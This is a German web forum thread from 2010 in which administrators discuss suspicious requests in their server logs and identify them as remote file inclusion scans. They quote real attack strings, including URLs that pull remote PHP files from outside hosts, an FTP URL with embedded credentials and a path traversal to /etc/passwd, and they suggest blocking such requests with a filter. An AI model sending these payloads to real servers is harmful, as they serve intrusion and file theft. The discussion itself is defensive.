Interessanter HTTP Request

[Mario]

Bei meiner heutigen Logfile Kontrolle hab ich mal wieder recht interessante Requests gefunden. Die heutige mir bisher unbekannte Variante:

x.x.x.x - - [03/Mar/2010:01:00:01 +0100] "GET //wbb2/portal.php?sid=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"

Mal abgesehen davon, das der Ordner wbb2 nicht existiert und alle Requests dieser Art mit 404 beantwortet wurden, hier mal noch der Inhalt der Textdatei, die per Querystring an die portal.php übergeben werden sollte:

zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Mir scheint da hat jemand (manuell?) getestet oder vorbereitet ...

Unter welcher Kategorie laufen solche Requests? Cross-Site Scripting oder .. Forgery? Sind euch solche Requests auch schon untergekommen?

 

[cosimo.de]

Ja, das wird immer mehr. Wird aber vom IPS gefiltert und kommt so gar nicht bis zum Server.

Machmal sind sogar FTP daten drin

/include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt???
mail.inc.php?root=http://car.sorabol.ac.kr///xe/files/.files/id1???
.inc.php?root=http://rombusz.com/wp-admin/css/color.css??
index.php?id=../../../../../../../../../../../../../../../etc/passwd
/index.php?id=ftp://toolsphp:311205@ftp.webcindario.com/rst.php?

 

[dev]

Unter welcher Kategorie laufen solche Requests? Cross-Site Scripting oder .. Forgery? Sind euch solche Requests auch schon untergekommen?

Google nach "Remote File Inclusion" -> RFI.

Diese Requests sind an der Tagesordnung, das ist normales Grundrauschen.

 

[Deleted member 4401]

Yep, sind meistens automatische Scans ganzer IP-Ranges und nicht zielgerichtet....also nix worüber man sich Sorgen machen müsste (insofern man natürlich eventuell auf dem Server benutzte Plattformen wie Joomla, phpbb, phpnuke, etc. auf dem neusten Stand hält).

Das Ganze lässt sich übrigens auch sehr leicht blockieren indem man Requests die den String =http:// enthalten filtert...z.B. mit mod security oder mod rewrite.